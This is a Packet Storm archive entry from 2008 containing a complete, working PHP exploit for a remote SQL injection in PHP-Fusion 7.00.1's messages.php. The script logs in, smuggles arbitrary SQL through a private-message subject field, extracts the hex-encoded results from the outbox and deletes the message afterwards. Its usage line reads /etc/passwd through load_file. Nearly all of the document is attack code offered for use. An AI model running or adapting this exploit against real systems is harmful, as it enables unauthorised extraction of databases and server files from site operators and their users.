phpfusion7001-sql.txt

2008-11-20T00:00:00
ID PACKETSTORM:72136
Type packetstorm
Reporter irk4z
Modified 2008-11-20T00:00:00

Description

                                        
                                            `<?php  
/*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*  
PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit  
requires magic_quotes == off  
  
coded by irk4z[at]yahoo.pl  
homepage: http://irk4z.wordpress.com  
  
greets: all friends ;)  
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*/  
  
$host = $argv[1];  
$path = $argv[2];  
$login = $argv[3];  
$pass = $argv[4];  
$sql_injection = $argv[5];  
  
echo  
"*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\n".  
" PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit\n".  
" requires magic_quotes == off\n".  
"\n".  
" coded by irk4z[at]yahoo.pl\n".  
" homepage: http://irk4z.wordpress.com\n".  
"\n".  
" greets: all friends ;)\n".  
"*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\n";  
  
if(empty($host) || empty($path) || empty($login) || empty($pass) || empty($sql_injection) ){  
echo "Usage: php $argv[0] <host> <path> <login> <pass> <SQL>\n" .  
" php $argv[0] localhost /php-fusion/ user s3cret \"SELECT database()\"\n".  
" php $argv[0] localhost / user s3cret \"SELECT load_file(0x2F6574632F706173737764)\"\n\n";  
die;  
}  
  
echo "Logging into system...";  
//login to php-fusion using login and pass  
$login_data = send($host, array( "path" => $path."news.php",  
"post" => array(  
"user_name" => $login,  
"user_pass" => $pass,  
"login" => "Login"  
)  
)  
);  
  
//get cookies  
preg_match_all("/Set-Cookie:[\s]+([a-z_A-Z0-9]+=[a-z_A-Z0-9\.]+;)/", $login_data, $matches);  
$cookies = implode(' ', $matches[1]);  
  
//get user id  
preg_match_all("/([0-9])+.([a-zA-Z0-9]{32})/", $cookies, $matches);  
$my_id = $matches[1][0];  
  
if(empty($my_id)){  
echo "\n[x] Incorrect login or password..";  
die;  
} else {  
echo "[ok]\n";  
}  
  
$id_message = uniqid();  
$inhex = '';  
for($i = 0; $i < strlen($id_message); $i++) $inhex .= dechex( ord($id_message[$i]) ) ;  
  
echo "Running sql-injection...\n";  
//running sql-injection  
$res = send($host, array( "path" => $path."messages.php?msg_send={$my_id}%27%2F%2Axxx&",  
"cookie" => $cookies,  
"post" => array(  
"send_message" => 'X',  
"subject" => "X*/,0x{$inhex}, (SELECT/**/concat(0x{$inhex}{$inhex},hex(($sql_injection)),0x{$inhex}{$inhex})),0x79,1,1226787120,1)/*",  
"message" => "XXX"  
)  
)  
);  
  
echo "Getting data...\n\n";  
$res = send($host, array( "path" => $path."messages.php?folder=outbox",  
"cookie" => $cookies )  
);  
  
preg_match_all("/msg_read=([0-9]+)'>{$id_message}<\/a>/", $res, $matches);  
$id_message_number = $matches[1][0];  
  
$res = send($host, array( "path" => $path."messages.php?folder=outbox&msg_read=".$id_message_number,  
"cookie" => $cookies )  
);  
  
preg_match_all("/{$id_message}{$id_message}(.*){$id_message}{$id_message}/", $res, $matches);  
  
if( empty($matches[1][0]) ){  
echo "[x] Failed... maybe SQL-INJ is incorrect?\n\n";  
} else {  
$tmp = '';  
$hex = $matches[1][0];  
//unhex it!  
for($i = 0; $i < strlen($hex); $i+=2) $tmp .= chr(hexdec($hex[$i] . $hex[$i+1]));  
echo "DATA: \n".$tmp."\n\n";  
}  
  
echo "Deleting message...\n";  
  
$res = send($host, array( "path" => $path."messages.php?folder=outbox&msg_id=".$id_message_number,  
"cookie" => $cookies,  
"post" => array (  
"delete" => "Delete"  
)  
)  
);  
  
//send http packet  
function send($host, $dane = "") {  
$packet = (empty($dane['post']) ? "GET" : "POST") . " {$dane["path"]} HTTP/1.1\r\n";  
$packet .= "Host: {$host}\r\n";  
  
if( !empty($dane['cookie']) ){  
$packet .= "Cookie: {$dane['cookie']}\r\n";  
}  
  
if( !empty($dane['post']) ){  
$reszta_syfu = "";  
foreach($dane['post'] as $tmp => $tmp2){  
$reszta_syfu .= $tmp . "=" . $tmp2 . "&";  
}  
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";  
$packet .= "Connection: Close\r\n";  
$packet .= "Content-Length: ".strlen($reszta_syfu)."\r\n\r\n";  
$packet .= $reszta_syfu;  
} else {  
$packet .= "Connection: Close\r\n\r\n";  
}  
  
$o = @fsockopen($host, 80);  
if(!$o){  
echo "\n[x] No response...\n";  
die;  
}  
fputs($o, $packet);  
while (!feof($o)) $ret .= fread($o, 1024);  
fclose($o);  
return ($ret);  
}  
  
?>  
  
`